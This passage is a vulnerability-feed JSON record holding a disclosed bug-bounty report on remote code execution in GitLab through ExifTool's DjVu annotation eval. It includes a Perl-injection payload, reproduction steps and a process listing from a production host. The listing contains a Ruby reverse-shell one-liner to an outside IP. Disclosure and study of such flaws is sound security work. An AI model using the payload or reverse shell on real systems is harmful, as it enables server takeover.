8vXCu49pXSOyFG6EQuKbygFKB5HMlSqDBAj3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAIaDDAxMzYxOTI3NDg0OSIMeh7fiziis1iiXUd2KtcD%2Fz7I4bh2qrLupIUTuq%2BfWlFlXswI%2FTzo0UX4bFYZXnFlfz%2BtAYgcuq35RGjQlU5eSL3JH5gV5vHsyd8Lv3DACLyBNwaisxytP1SzPN9MVTpjqxIIhkgdiERR2GX%2F6WWzXjYXCX%2BaBlLI25KRg14YEc97XnSW1iynr7N6cN1QJQuVCnwl22XpdklITQft6esAkwWHe%2B7deXP5TK4IjyfR151qZJqGbA9xOEU%2BbdxS6YArm%2BhAHQ5M84hOsNa6FOkLRnvMncLd5BlCdw3PVIW1kLQVy9jol5XdKMDQJWeeLoc3BA3DvSsv4Uq%2F%2FFoIpVHslIHBoN0jH%2BNMy6JW4crSjvzfp%2BF7iZd9CP%2BFq8xG%2BUFZV0ePkbzucsUuVh5YXzLaQsB%2FbSNgSXV8VH5Ng25vWGKDqpGntpQsViM11WuM8pnSS4mgEsEx0kI9Cd1iwMqbV83xgUbXPpF%2Bxr7MCyCBOMPMFoFg3%2BLYHCMt1YUvCgZbgcdtA3Y1yjQLrH2O1RSkhr3f7ATqkFe%2FV6Vllylfbq3De%2FnaDVbiLU%2FFcgUDuQM6JUC8hAM5sNd2V%2FQBrg2KLsxA0uZH%2BUomvqHV8b%2B55qgYUk%2B%2B5rRi0NRTdQ7lZw9dswvRB0wQMPvl%2B4QGOqYBgzNfjOkUATyGMgbSUfbnjR8ENeFlA4mk7rasZ9xvZUCFqAYgwUjjPragXa3lqTUNvQXoGNNk3anwzFKvijZPYfHhFhDdd4ZKrfKn8PiVWTeYq%2F41yl4Kyo2zz857jl9wkREQF8v4pK7PgipJwdInCOjgYxvw5J2IHYnqR6qmWBlv%2F5eRCT7gY4qDcADkhUK5%2FPhreTtcpS4Kxn8WbaCBi%2FXHlhNbNw%3D%3D&X-Amz-Signature=605e46f36241e47d8b4ef8e5a2972b47c9a241a913b0e9eb5f8be5ad297a4ab3"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T03:29:46", "differentElements": ["h1reporter"], "edition": 8}, {"bulletin": {"id": "H1:1154542", "hash": "ed64aa2e4d9ce528e3a4f0780e67b9e2", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? 